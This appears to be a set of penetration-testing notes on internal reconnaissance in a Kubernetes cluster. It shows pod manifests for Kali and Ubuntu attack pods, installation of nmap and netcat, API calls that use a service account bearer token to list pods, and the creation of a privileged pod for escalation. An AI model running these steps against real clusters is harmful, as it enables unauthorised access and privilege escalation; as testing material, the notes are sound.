Internal recon
Environment variables
Service Account token
Namespace
Test pod = Kali
kali.yaml
apiVersion: v1
kind: Pod
metadata:
name: kali
namespace: <some-valida-namespace>
spec:
containers:
- name: kali
image: "kalilinux/kali-rolling"
command:
- sleep
- infinity
kubectl exec --stdin --tty kali -n $NAMESPACE -- /bin/sh
/bin/bash
apt update
apt install -y nmap
apt install -y netcat-traditional
Test pod = Ubuntu
ubuntu.yaml
apiVersion: v1
kind: Pod
metadata:
name: ubuntu
namespace: <some-valida-namespace>
spec:
containers:
- name: ubuntu
image: ubuntu
securityContext:
allowPrivilegeEscalation: True
command:
- sleep
- infinity
kubectl exec --stdin --tty ubuntu -n $NAMESPACE -- /bin/sh
/bin/bash
apt update
apt install -y curl
apt install -y jq
apt install -y vim
API
List pods
curl -H "Authorization: Bearer $TOKEN" https://34.28.85.34/api/v1/namespaces/$NAMESPACE/pods/ --insecure | jq ".items[].metadata.name"
Crete pod
cat > test-pod.json <<EOF
{
"apiVersion": "v1",
"kind": "Pod",
"metadata": {
"name": "ubuntu",
"namespace": "<some-valida-namespace>"
},
"spec": {
"containers": [
{
"name": "ubuntu",
"image": "ubuntu",
"command": [
"sleep",
"infinity"
],
"securityContext": {
"allowPrivilegeEscalation": true,
"privileged": true
}
}
]
}
}
EOF
curl -k -v -X POST -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://34.28.85.34/api/v1/namespaces/$NAMESPACE/pods -d@test-pod.json